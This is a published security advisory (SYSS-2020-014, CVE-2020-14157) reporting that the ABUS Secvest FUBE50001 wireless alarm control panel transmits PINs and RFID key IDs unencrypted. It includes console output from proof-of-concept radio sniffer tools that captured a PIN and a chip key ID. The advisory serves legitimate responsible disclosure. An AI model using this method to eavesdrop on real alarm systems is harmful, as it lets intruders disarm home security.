Advisory ID: SYSS-2020-014 Product: ABUS Secvest Wireless Control Device (FUBE50001) Manufacturer: ABUS Affected Version(s): N/A Tested Version(s): N/A Vulnerability Type: Missing Encryption of Sensitive Data (CWE-311) Risk Level: High Solution Status: Open Manufacturer Notification: 2020-04-03 Solution Date: - Public Disclosure: 2020-06-17 CVE Reference: CVE-2020-14157 Authors of Advisory: Michael Rüttgers, Thomas Detert, Matthias Deeg (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: ABUS Secvest Wireless Control Device (FUBE50001) is a wireless control panel for the ABUS Secvest wireless alarm system. Some of the device features as described by the manufacturer are (see [1]): " * Easy operation via code or proximity keyfob The Secvest wireless control panel is an optional Secvest accessory. Every wireless control panel can be operated from your system via PIN code. It is possible to arm and disarm the panel via proximity keyfob. * Flexible use in entrance areas Up to 8 control panels can be integrated into the alarm system. These additional modules can be placed in various areas of the building. This provides added convenience for you, because Secvest can be armed and disarmed directly on the wireless control panel, without the need to go back to the central alarm panel every time. In addition to internal arming or arming individual sub-areas, you can also switch a single output, such as the garage door, if desired. * Secure wireless communication Thanks to a secure wireless communication procedure, this product is protected against ‘replay attacks’, as are the Secvest wireless alarm system and Secvest Touch alarm systems. This procedure for preventing third-party tampering exceeds the requirements of the “DIN EN 50131-1 level 2” security standard. " Due to the missing encryption of the wireless communication, an attacker is able to eavesdrop sensitive data as cleartext, for instance, used PINs or proximity token IDs. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Michael Rüttgers found out that the wireless communication of the ABUS Secvest Wireless Control Device (FUBE50001) for transmitting sensitive data like PIN codes or IDs of used proximity chip keys (RFID tokens) is not encrypted. This security issue is related to the insecure wireless transmission of sensitive data of the ABUS Secvest remote controls FUBE50014 and FUBE50015 reported back in 2018 (see SySS security advisory SYSS-2018-035 [2]). Thus, an attacker observing radio signals of an ABUS FUBE50001 wireless control panel is able to see all sensitive data of transmitted packets as cleartext and can analyze the used packet format and the communication protocol. For instance, this security issue could successfully be exploited to sniff used PIN codes and used proximity chip key IDs. By knowing the correct PIN code or the ID of a valid ABUS Secvest proximity chip key, an attacker is able to disarm the wireless alarm system in an unauthorized way. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Michael Rüttgers, Thomas Detert, and Matthias Deeg developed different PoC software tools, either for the RFCat-based radio dongle YARD Stick One [3] in one version, or the GreatFet One neighbor Erica [4] in another one, that allowed sniffing out used PIN codes or used proximity chip key IDs when eavesdropping on the FUBE50001 wireless communication. The following output exemplarily shows a successful PIN code sniffing attack: $ python2 abus_fube50001_pin_sniffer.py ABUS Secvest FUBE50001 PIN Code Sniffer PoC - SySS GmbH (c) 2020 by Thomas Detert, Michael Rüttgers, and Matthias Deeg --- [*] Listening for ABUS FUBE50001 packets ... [*] Received packet: f0f352b4ccb4ccd52aab52d2acd2d34d4cb34cb333332b34d4b530f0f0f352b4ccb4ccd52aab52d2acd2d34d4cb34cb333332b34d4b530f0f0f333333333117162f5 [*] Decoded packet : da0a077ed5c549888800626b [*] Received packet: f0f352b4b32b4d352ad5332aab2cb34cd3332cccb4ccacb354acaaaaccccd2ab32aab54d30f0f0f352b4b32b4d352ad5332aab2cb34cd3332cccb4ccacb354acaaaa [*] Decoded packet : da86937707e4884040a0c8ecff005e1fb9 [*] Detected FUBE50001 packet with FUBE50001 PIN [+] Sniffed PIN code: 1337 (...) An example of a successful sniffing attack regarding the ID of an ABUS proximity chip key is illustrated in the following output: $ python2 abus_fube50001_chip_key_id_sniffer.py ABUS Secvest FUBE50001 Proximity Chip Key ID Sniffer PoC - SySS GmbH (c) 2020 by Thomas Detert, Michael Rüttgers, and Matthias Deeg --- [*] Listening for ABUS FUBE50001 packets ... [*] Received packet: f0f352b4b332b2cad52accd554d34cb32cccd33332b34ab2cd2b2d4ad32ad2aacaacd32b30f0f0f3057c0764bf788b6ce7d0de43f6c1cb71e7374b7bd7c7a1abe567 [*] Decoded packet: da81937707e488404018b9165b475f3c46 [*] Detected FUBE50001 packet with proximity token ID [+] Sniffed proximity chip key ID: 3805964445 (...) The described sniffing attacks are also demonstrated in the SySS Proof-of-Concept Video titled "ABUS Secvest Sniffing Attack" which is available on the SySS YouTube Channel [8]. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: SySS GmbH is not aware of a solution for this reported security vulnerability. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2020-04-03: Vulnerability reported to manufacturer 2020-06-17: Public release of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for ABUS Secvest wireless control device https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Control-devices-and-extensions/Secvest-Wireless-Control-Device [2] SySS Security Advisory SYSS-2018-035 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-035.txt [3] Product website YARD Stick One https://greatscottgadgets.com/yardstickone/ [4] GreatFET One neighbor Erica targeting the 315/433/868/915 MHz freqency bands https://github.com/AsFaBw/erica [5] GreatFET wiki https://github.com/greatscottgadgets/greatfet/wiki [6] SySS Security Advisory SYSS-2020-014 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-014.txt [7] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ [8] SySS Proof of Concept Video: ABUS Secvest Sniffing Attack https://www.youtube.com/watch?v=kCqAVYyahLc ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Michael Rüttgers and Thomas Detert. Mr. Rüttgers and Mr. Detert reported this finding to SySS GmbH where it was verified and later reported to the manufacturer by Matthias Deeg. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en